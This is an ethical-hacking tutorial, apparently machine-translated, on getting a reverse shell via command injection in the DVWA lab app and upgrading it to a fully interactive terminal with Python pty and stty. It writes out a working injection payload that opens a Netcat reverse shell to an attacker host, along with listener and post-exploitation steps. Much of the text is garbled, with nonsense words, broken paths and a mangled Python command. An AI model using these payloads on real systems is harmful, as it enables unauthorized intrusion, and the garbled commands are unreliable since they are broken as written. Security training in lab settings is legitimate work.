One of the most exciting things about being an ethical hacker is, in my opinion, catching a reverse shell. Often, however, these shells are limited because they lack the full power and functionality of a suitable terminal. Certain things do not work in these environments and can be difficult to work with. Fortunately, with a few commands, we can upgrade to a fully interactive shell with all the bells and whistles.
Working with inverted shells can often be frustrating if you only have one "dumb" shell. A dumb shell is a kind of shell that does not have the full functionality of a proper terminal. This means that things like tab filling, keyboard shortcuts, and terminal history just do not exist.
Certain commands like su do not work in fools. Text editors do not work very well even under these conditions, which can be painful.
Maybe it's the most annoying thing that can happen (I'm sure it happened to many of you) to accidentally lose your session by clicking the wrong button key. Suppose you execute a command that hangs, and you instinctively press Control-C to abort it. Well, there goes your shell. It can be annoying, especially if there are a lot of steps to get this shell.
However, with a bit of command-line magic, we can work around that limitation and prevail with a fully functional interactive shell.
: Obtain a Restricted Shell
To begin, we use the command injection to get our initial shell. For demonstration, we use DVWA (Damn Vulnerable Web App), but you can use a similar test configuration. Navigate to DVWA and sign in with the default credentials.
Next, go to the DVWA Security page and change the security level to Low. This will ensure that everything is working properly.
Now we can launch a listener on Kali with Netcat to intercept incoming connections to our computer. The flags can all be grouped as -lvp where -l launches a listener, -v details it and gives -p the port on ( 1234 in this exercise).
~ # nc-lvp 1234 Listen for [any] 1234 ...
In DVWA, navigate to the "Command Execution" page. It will allow us to restrict a system command to the standard functionality of pinging an IP address.
The entire command is listed below. It tells the target to connect to our computer via port 1234 via Netcat and then run a bash shell.
localhost && nc 10.10.0.1 1234 -e / bin / bash
Once we have clicked "Submit", we should see a connection to our listener open. No prompt is displayed, only a flashing cursor.
10.10.0.50: Inverse host search failed: Unknown host Connecting to [10.10.0.1] by (UNKNOWN) [10.10.0.50] 52685
This is how many shells look, especially after being retrieved from a web application. When we execute a command like id we can see that it works.
id uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
Step 2: Create a bash shell
One of the simplest and most reliable ways to update a silly shell A fully interactive shell can be created with Python. If the target is a Linux box, you will probably have a version of Python installed.
First, check which version of Python is installed with the command which .
which python / usr / bin / python
Usually, Python or Python3 is displayed. Now we can use it to create a proper bash shell. Below, the flag -c indicates the command to execute. In this case, the module pty is imported first. The pty module provides the shell with pseudo-terminal functions that are useful for some commands that require a terminal environment to execute. Then a bash shell will be created and after pressing Enter we should see a real command prompt.
python -c # import pty; pty.spawn ("/ bin / bash") & # 39; www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $
Well, that's a little bit better, but we do not have any tab completion or command history and if we push Control-C it will leave the session. Next, we'll be upgrading to a fully functional shell with a little Linux Fu.
The next thing we need to do does not seem to be intuitive, but the shell with [19459007zuhinterlegen] Control-Z .
www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ ^ Z  + Stopped nc -lvp 1234 root @ drd: ~ #
We need some information about our own terminal. Use the command echo to display the currently selected terminal.
~ # echo $ TERM xterm-256color
Enter stty -a to display the properties.
~ # stty -a Speed 38400 baud; Rows 56; Columns 213; line = 0; intr = ^ C; quit = ^ ; Delete = ^? kill = ^ U; eof = ^ D; eol =
; eol2 = ; swtch = ; start = ^ Q; stop = ^ S; susp = ^ Z; rprnt = ^ R; werase = ^ W; lnext = ^ V; reject = ^ O; min = 1; Time = 0; -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr -icrnlixon -ixoff -iuclc -ixany -imaxbel iutf8 opost -olcuc -crnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echo echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
Make note of the number of rows and columns. Next, enter the following command, which lets you pass keyboard shortcuts.
~ # stty raw -echo
Now enter fg to put the background shell in the foreground. You can not see these letters on the screen as you type, but press . Then enter and the Netcat command will be displayed automatically. Next, enter reset to reset the terminal. It will look weird if you enter it, but it works.
~ # nc-lvp 1234 reset
You may be prompted to set the terminal type. Sometimes the color version of xterm does not work, so we can just use the regular xterm instead.
reset: unknown terminal type unknown Terminal type? xterm 256color Reset: unknown terminal type xterm-256color Terminal type? xterm
If you can not clear the screen or use the up arrow to view the history, use the following commands to redetermine the terminal type and shell.
www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ export TERM = xterm www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ export SHELL = bash
Now you just have to set the appropriate size of the terminal. Sometimes, when we drill down into a directory or have a very long prompt, the input is wrapped and hard to read. By putting the rows and columns on the same level as our native terminal, we can avoid this.
www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ stty rows 56 columns 213
We now have a fully interactive shell that lets us use keyboard shortcuts, clear the screen, save the history, and Use all the features of your favorite local terminal over a Netcat connection.
Today we learned about stupid shells and their limitations, as well as what might go wrong with their use. First, we got our first shell via command injection. We then used Python to create a bash shell and finally mirror our current terminal configuration to upgrade to a fully interactive shell. With this technique, you can now stylishly reverse the shell.